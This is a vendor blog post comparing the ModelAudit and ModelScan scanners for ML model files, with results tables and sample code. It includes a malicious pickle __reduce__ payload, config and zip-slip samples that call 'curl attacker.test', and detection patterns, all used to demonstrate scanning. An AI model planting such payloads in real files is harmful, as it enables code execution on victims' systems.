---
title: 'ModelAudit vs ModelScan: Comparing ML Model Security Scanners'
description: 'Compare ModelAudit and ModelScan for ML model security scanning. Learn how comprehensive format support and detection capabilities differ between these tools.'
image: /img/blog/modelaudit/modelaudit-vs-modelscan.jpg
date: 2025-07-06
authors: [ian]
tags: [tool-comparison, best-practices]
---
As organizations increasingly adopt machine learning models from various sources, ensuring their security has become critical. Two tools have emerged to address this need: Promptfoo's ModelAudit and Protect AI's ModelScan.
To help security teams understand their options, we conducted a comparison using 11 test files containing documented security vulnerabilities. The setup of this comparison is entirely open-source and can be accessed on GitHub.
Our comparison focused on real-world attack vectors commonly found in ML model supply chains.
Each test file was scanned with both tools (ModelAudit v0.1.0 and ModelScan v0.8.5) in June 2025, with results independently verified.
The tools differ significantly in the number of file formats they can analyze:
| Metric | ModelAudit | ModelScan |
| --- | --- | --- |
| Files analyzed | 11/11 (100%) | 6/11 (55%) |
| Pickle files | 5/5 | 4/5 |
| Configuration files | 3/3 | 0/3 |
| Archive files | 2/2 | 2/2 |
| Other formats | 1/1 | 0/1 |
ModelScan focuses primarily on pickle-based formats (including PyTorch .pt/.pth files), Keras H5 files, and TensorFlow SavedModel directories. ModelAudit additionally supports configuration files (JSON, YAML, XML), ONNX models, SafeTensors, NumPy arrays, and PMML files.
Across the 11 test files, the scanners identified different numbers of security issues:
| Metric | ModelAudit | ModelScan |
| --- | --- | --- |
| Total issues detected | 16 | 3 |
| Files with detections | 8 | 3 |
| Average issues per malicious file | 2.0 | 1.0 |
Both tools successfully detected malicious pickle files. For a file containing `os.system` execution via `__reduce__`:

- ModelScan flagged the `posix.system` reference
- ModelAudit flagged both the `REDUCE` opcode and the `posix.system` reference

This pattern repeated across other pickle test cases, with ModelAudit typically identifying both the execution mechanism and the dangerous function call.
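The `__reduce__` attack that both scanners target can be sketched in a few lines. This is an illustrative payload of our own, not code from either tool, and the payload is only inspected statically, never loaded:

```python
import os
import pickle
import pickletools

# Illustrative malicious payload: __reduce__ tells pickle to call
# os.system("echo pwned") whenever the file is deserialized.
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(MaliciousPayload())

# Static inspection, as a scanner would do -- the payload is never unpickled.
opcodes = [op.name for op, arg, pos in pickletools.genops(payload)]
print("REDUCE" in opcodes)   # True: the execution mechanism
print(b"system" in payload)  # True: the dangerous callable reference
```

Loading such a file with `pickle.load` would execute the shell command, which is why static opcode analysis, rather than deserialization, is the standard way to scan untrusted pickles.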
Only ModelAudit currently analyzes configuration files. In our test of a malicious JSON configuration file containing webhook URLs, exposed API keys, and executable code patterns, ModelAudit identified 4 distinct security issues while ModelScan could not process the file.
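A configuration check of this kind can be approximated with simple pattern matching. The regexes and example config below are hypothetical illustrations of the approach, not ModelAudit's actual rules:

```python
import json
import re

# Hypothetical detection rules for the three issue classes mentioned above.
SUSPICIOUS_PATTERNS = {
    "webhook URL": re.compile(r"https?://hooks\.[\w.-]+"),
    "exposed API key": re.compile(r"(?i)api[_-]?key\s*[\"':=]+\s*[\"']?[\w-]{16,}"),
    "executable code": re.compile(r"\b(eval|exec|os\.system|subprocess)\b"),
}

def scan_config(text: str) -> list[str]:
    """Return the names of all suspicious patterns found in a config blob."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]

# Example malicious config (invented for illustration).
config = json.dumps({
    "callback": "https://hooks.example.com/exfil",
    "api_key": "sk-abcdef0123456789abcdef",
    "on_load": "os.system('curl attacker.test')",
})
print(scan_config(config))  # → ['webhook URL', 'exposed API key', 'executable code']
```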
Both tools support ZIP file scanning, but with different security checks.
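One common archive check is detecting "zip slip" entries whose paths escape the extraction directory. Here is a minimal sketch of that check (our own illustration, not either tool's implementation):

```python
import io
import zipfile

def find_traversal_entries(data: bytes) -> list[str]:
    """Return archive entry names that would escape the extraction directory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [
            name for name in zf.namelist()
            if name.startswith("/") or ".." in name.split("/")
        ]

# Build a small in-memory archive with one benign and one malicious entry.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("model/weights.bin", b"\x00")
    zf.writestr("../../etc/cron.d/evil", b"* * * * * root curl attacker.test")

print(find_traversal_entries(buf.getvalue()))  # → ['../../etc/cron.d/evil']
```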
Both tools provide:
Notable differences:
ModelAudit is also not just a CLI: it ships with an optional web UI via the `promptfoo` package.
For organizations implementing ML security scanning:

- **Format diversity**: Teams using multiple ML frameworks or configuration-driven pipelines may need broader format support
- **Detection depth**: The difference in detection counts (16 vs 3 issues) reflects different approaches to identifying security risks
- **Integration requirements**: Both tools offer CLI and JSON output suitable for CI/CD pipelines
- **Complementary use**: Some organizations might benefit from using both tools for different stages of their ML pipeline
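A CI gate over a scanner's JSON output can look like the following sketch. The `issues` field and report shape here are assumptions for illustration, not the documented schema of either tool:

```python
import json
import subprocess
import sys

def gate(command: list[str]) -> int:
    """Run a scanner command that prints JSON; return a nonzero exit code if
    it reports any issues. The 'issues'/'severity'/'message' keys are a
    hypothetical report shape, not either tool's actual schema."""
    result = subprocess.run(command, capture_output=True, text=True, check=True)
    report = json.loads(result.stdout)
    for issue in report.get("issues", []):
        print(f"[{issue.get('severity', '?')}] {issue.get('message', '')}")
    return 1 if report.get("issues") else 0

# Stand-in scanner for demonstration; in CI this would be the real scanner
# invocation with its JSON-output flag.
payload = json.dumps({"issues": [{"severity": "high", "message": "REDUCE opcode"}]})
fake_scanner = [sys.executable, "-c", f"print({payload!r})"]
print(gate(fake_scanner))  # → 1 (build should fail)
```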
All test files and comparison scripts are available on GitHub for independent verification:
```bash
# Generate test files
python generate_test_models.py

# Run comparison
python run_comparison_fixed.py

# View results
cat results/summary_fixed.json
```
ModelScan provides focused pickle security scanning, while ModelAudit offers broader format coverage and additional security checks. Organizations should evaluate their specific needs, including the ML frameworks they use, the types of models they deploy, and their security requirements when choosing between these tools.
The empirical data from our testing provides a baseline for comparison, but each organization's needs will vary based on their ML infrastructure and threat model. We encourage teams to test both tools with their own model formats and security requirements to make an informed decision.
Note: This comparison used ModelAudit v0.1.0 and ModelScan v0.8.5. Both tools are under active development, and capabilities may change in future versions.